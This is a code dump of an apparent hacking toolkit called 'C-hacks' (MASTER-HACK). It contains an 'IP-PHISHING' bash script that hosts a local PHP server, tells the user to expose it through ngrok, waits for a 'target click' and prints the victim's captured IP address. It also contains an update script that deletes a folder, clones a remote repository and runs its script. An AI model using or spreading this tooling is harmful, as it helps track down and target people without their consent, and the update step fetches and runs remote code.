\e[1;91m[\e[0m\e[1;97m!\e[0m\e[1;91m]\e[0m\n" 359 | 360 | sleep 1 361 | 362 | banner 363 | 364 | menu 365 | 366 | fi 367 | 368 | } 369 | 370 | ip_phishing() { 371 | 372 | bash iplocalmasterphish.py 373 | } 374 | banner 375 | 376 | menu 377 | -------------------------------------------------------------------------------- /ip/file/Script/iplocalmasterphish.py: -------------------------------------------------------------------------------- 1 | intro() { 2 | clear 3 | echo "" 4 | echo -e " 5 | 6 | by " 7 | 8 | figlet MASTER-HACK |lolcat 9 | 10 | figlet IP-PHISHING 11 | 12 | echo -e "\e[92m" 13 | echo 14 | echo -e "[1] IP PHISHING " 15 | echo 16 | echo -e "[2] BACK TO MAIN MENU" 17 | echo 18 | read -p "ENTER AN OPTION : " option 19 | if [ $option = 1 ]; 20 | then 21 | main 22 | elif [ $option = 2 ]; 23 | then 24 | cd 25 | fi 26 | } 27 | 28 | main () { 29 | clear 30 | echo "" 31 | echo -e " 32 | 33 | 34 | by " 35 | 36 | figlet MASTER-HACK |lolcat 37 | figlet IP-PHISHING 38 | echo "" 39 | echo "" 40 | echo -e "\e[31m hi I am nidhin 41 | " 42 | echo -e "\e[92m" 43 | read -p "ENTER A PORT : " port 44 | php -S 127.0.0.1:$port > /dev/null 2>&1 & 45 | sleep 1.7 46 | echo 47 | echo -e "\e[31m[•] \e[33m CONNECT WITH NGROK \e[31m[•]" 48 | echo 49 | echo -e "\e[31m[°] \e[36mSERVER HOSTED AT : \e[92m127.0.0.1:$port" 50 | echo 51 | echo -e "\e[0m--------------------------------" 52 | echo -e "\e[31m[~] \e[33mWAIT FOR TARGET CLICK \e[31m[~]\e[0m" 53 | echo -e "--------------------------------" 54 | 55 | echo 56 | 57 | 58 | rm -rf ip.txt 59 | 60 | while true; 61 | do 62 | if [ -e ip.txt ]; 63 | then 64 | echo 65 | ip5=$(cat ip.txt | grep IP: | awk '{print $2}') 66 | echo -e "\e[31m[!] \e[95mIP FOUND : \e[92m$ip5" 67 | rm -rf ip.txt 68 | fi 69 | done 70 | 71 | } 72 | 73 | intro 74 | -------------------------------------------------------------------------------- /p.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DRACULA-HACK/C-hacks/e34536cbaae082d36f13ed846f39c0f5f8a732fe/p.zip -------------------------------------------------------------------------------- /update.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | echo -e " updating " |lolcat 4 | echo "" 5 | echo "" 6 | cd $home 7 | echo " please wait " | pv -qL 50| lolcat 8 | echo "" 9 | echo "" 10 | 11 | 12 | rm -rf C-hacks 13 | 14 | git clone https://github.com/DRACULA-HACK/C-hacks 15 | clear 16 | cd C-hacks 17 | 18 | chmod +x Chack.sh 19 | 20 | ./Chack.sh 21 | --------------------------------------------------------------------------------